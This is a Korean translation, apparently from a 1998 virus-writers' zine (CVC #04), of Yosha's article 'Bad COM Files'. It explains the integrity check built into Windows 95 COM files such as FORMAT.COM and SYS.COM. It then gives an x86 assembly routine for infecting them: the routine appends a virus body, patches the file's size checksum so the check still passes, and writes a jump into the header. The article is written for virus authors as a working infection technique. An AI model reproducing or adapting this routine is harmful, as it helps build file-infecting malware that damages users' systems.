
 Windows 95 에 포함된 나쁜 COM 파일들                           CVC #04  98/05

---------------------------------------------------------------------> Red_Fox

 본 내용은 Yosha 의 Bad COM Files 를 한국어 버전으로 Red_Fox 가 편집한것이다.
 항상 유용한 정보를 제공해 주는 LT/RSA 의 Yosha 에게 감사드린다.
 본인의 영어 실력이 부족해 오역도 많은 것이다. 하지만, 전체 적인 내용을 이해
 하기에는 문제 되지 않을 것이다.

                            "   나쁜 COM 파일들
                                    by
                                Yosha[LT/RSA]  "

  Windows 95 에 포함된 일부 COM 파일들은 자제 진단 기능을 가지고 있다. Yosha
는 자체 진단 기능을 가진 이들 COM 파일들을 분석해 보았다. 보통 WINDOWS\COMMAND
에 아래의 파일들이 있을 것이다.

파일            | 감염되었을때의 행동
------------------------------------------------------------------------------
SYS.COM         | 에러없이 도스로 나간다.
MORE.COM        | 정지
MODE.COM        | 에러없이 도스로 나간다.
CHOICE.COM      | [Y,N]? 대신에 [=, ']? 가 출력된다.
DOSKEY.COM      | 에러없이 도스로 나간다.
FORMAT.COM      | 에러없이 도스로 나간다.
KEYB.COM        | 에러없이 도스로 나간다.

헥스 에디터로 봤을때 모든 파일에서 유사점을 발견했다.

1) "Sloppy Micro$oft Coding" 로 불리는 것에 최적화 되어 있다.
2) EOF-7 에 한글 윈도우 95 의 경우 "KORNS" 가 존재한다. 영문판은 "ENUNS"
   가 존재한다. 그리고, 2 바이트의 크기 체크섬 값이 들어 있다.
3) ((Filesize - Size Checksum)+4) 에 또 다른 메시지가 존재한다. "ENU"

파일            | Filesize in hex   | Corean Windows 95
-----------------------------------------------------------------------
SYS.COM         | 3c47h             | 970Ah
MORE.COM        | 1437h             | 4704h
MODE.COM        | 9cc7h             | 7716h
CHOICE.COM      | 7207h             | 5707h
DOSKEY.COM      | 28e7h             | B710h
FORMAT.COM      | 33b7h             | 1729h
KEYB.COM        | 4dd7h             | 파일이 존재 하지 않음
DISKCOPY.COM    | ?                 | 2710h
-----------------------------------------------------------------------

코드를 추적해 본 결과 다음과 같은 작용을 한다.

1) 파일 오픈후 EOF - 7 로 이동한다.
2) 파일의 마지막 7 바이트를 읽는다.
3) EOF - 5 가 "NS" 인지 검사하다.
4) 파일사이즈에서 마지막 2 바이트를 뺏다. 거기서 포인터를 옮겨 또 다시
   "NS" 인지 검사한다.

이들 파일에 대한 해결책은 다음과 같다.

1) 풀 스텔스 기법을 사용하면 되지만 다른 컴퓨터로 전염시키기기 어렵다.
2) 파일의 빈영역에 쓰면된다. 불행히도 바이러스가 들어 갈 만큼의 빈영역이 존재
   하지 않는다.
3) 이들 파일을 감염시키지 않으면된다. 단지 (EOF-5) 가 "NS" 인지만 검사하면된다
4) 밑에 설명된 알고리즘으로 파일을 감염시킨다.
        
        mov     ax,4202h                        ;seek to EOF - 7
        mov     dx,-7
        mov     cx,-1
        int     21h

        mov     cx,7                            ;(eof-7)+7=eof
        add     ax,cx
        sub     ax,4                            ; 점프 계산
        mov     word ptr [newbytes+2],ax

        mov     ah,3fh                          ; 7 바이트 읽기
        mov     dx,offset buffer
        mov     cx,7
        int     21h                     

        add     word ptr [buffer+5],code_length ;adjust "size checksum"
        
        mov     ah,40h                          ; 파일 끝에 바이러스 쓰기
        mov     dx,offset start
        mov     cx,(Offset finish - offset start)
        int     21h

        mov     ax,4200h                        ; 파일 처음으로 이동
        xor     cx,cx
        cwd
        int     21h

        mov     ah,40h                          ; 새 헤더를 쓴다.
        mov     cx,4
        mov     dx,offset newbytes
        int     21h

no_infect:
        mov     ah,3eh                          ; 파일 닫기
        int     21h
newbytes:
        nop
        db      0e9h,0,0
buffer          db      5 dup (?)
size_checksum   db      2 dup (?)               ; 바이러스 사이즈를 더한다.
finish:
        end     start

  이러한 M$ 의 COM 파일을 감염시키기 위해서 VX 들은 연구했고 최근에 제작된 다
수의 바이러스는 M$ 윈도우의 COM 파일을 성공적으로 감염시키거나 감염을 피한다.

